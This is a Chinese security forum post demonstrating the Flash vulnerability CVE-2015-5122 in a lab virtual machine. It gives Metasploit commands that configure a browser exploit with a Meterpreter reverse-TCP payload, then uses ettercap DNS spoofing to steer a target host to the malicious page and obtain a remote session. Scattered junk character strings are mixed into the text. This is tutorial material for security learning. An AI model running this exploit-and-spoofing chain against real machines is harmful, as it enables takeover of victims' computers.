找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1540|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: m# m- Q4 ~7 R. z$ p 二、cve2015-5122漏洞实例演示虚拟机 ' d9 g) {8 ^- j5 {& M9 ~

! ^$ Q0 F! ^# l, X% a/ i" A' D

- O+ G8 e* s7 Q) W   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 6 x1 `9 U0 Q! }6 J' W2 L

+ w& {# C/ k; J7 D- t

/ G1 J4 t% m& u. g3 {0 V j e search cve-2015-5122如图: & j" U: T4 t& P p- G

4 i i/ I& K8 y( s! V- N' v7 n# `

4 p8 T4 m8 d( O1 ]   3 T( Q; X$ n' ?" }1 i

- o/ H" a; q# p" x( d2 t

; |( m: M; ~- y: E) l0 e 下面我们敲如下命令: 9 A# w( {1 n8 t, |. A

9 P" \- u. P2 v: B

8 D% E* Z; q+ `6 S( Q# k4 j use exploit/multi/browser/adobe_flash_opaque_background_uaf + C& w% y' G" U9 p

: @% P# P Q7 l0 y

& n9 x% D% Y. y { set PAYLOAD windows/meterpreter/reverse_tcp 0 _/ T! T" p$ x$ ~$ _9 h

- l. s+ B- m4 `; b$ e

7 ?; g3 m# u7 e" } set LHOST 192.168.0.109 1 ^& `5 |6 Q0 X. U

: ?& n% |5 U0 Z4 c

4 E: Y; [' F: L u- Q2 d) C) C2 c set URIPATH /                        /*根目录*/ " r! f o v, C

1 u/ W% u2 b5 I! I4 n% J

& f, e& b7 I+ P% ]% E' w6 K' a8 b set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ( q o# R y! O5 |/ b c! M

& _9 D, z# k! q% ^

3 A; F- ]- @$ ]+ d# O% T K; u set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 @/ E( B6 j# |4 c5 t, F1 `

( `5 V* v( c. C5 T

4 G1 e4 a/ E3 y 然后show options如图: ; P0 C6 h1 }2 i! T6 A$ s

# ~: X6 S# p. ]

1 a9 ?7 J9 i/ q   5 N1 R: T6 C5 j9 a5 d. q& M

$ U. ^! Q9 x: N! f; c6 a: K5 a

" d1 c* ?8 K. \+ r& Z6 r 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
" t* v4 E: a. [7 _$ r" a
/ s; ]9 K- t% f" z; {0 u b

& F! d8 H/ D$ A" H, p8 S

0 O' _! W! u" B5 x' f$ O 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 : X# f' d* B; ]7 f3 H

5 h* E( g/ e% [0 |. ^* r

3 Q* P& D% ~1 u$ } Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf $ p& O& S2 | R/ q# k7 y# R

7 j& _: i) n5 j; d

$ V$ g% r' \5 R0 b5 r   % J& @. O7 v6 p5 o5 D8 v" r

( M. L+ a& }3 y7 S

: ~' k2 V% \. |2 R1 ` 成功了,这时候我们断开ettercap,如图: * H# s2 h; K' D

& H3 Q* E/ `6 t4 x2 N+ N

$ w3 d2 k. W: P; k& [# i6 `   2 p2 }" h; ]. k E# b

* w k8 A+ U+ `3 q3 E

7 M6 n% y3 G) ] Screenshot如图: : N; ^* `8 N4 H- q$ h

3 @, J1 D2 h) m. K+ r* i

# @( Z- v9 a) @4 Z4 e. b   T1 m2 R& Q) H3 N; c" O3 i

: u: A7 g% l0 v# X

% @3 r) `& g/ Y1 N& p + j9 T6 a. o3 L! S4 s0 M. [

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表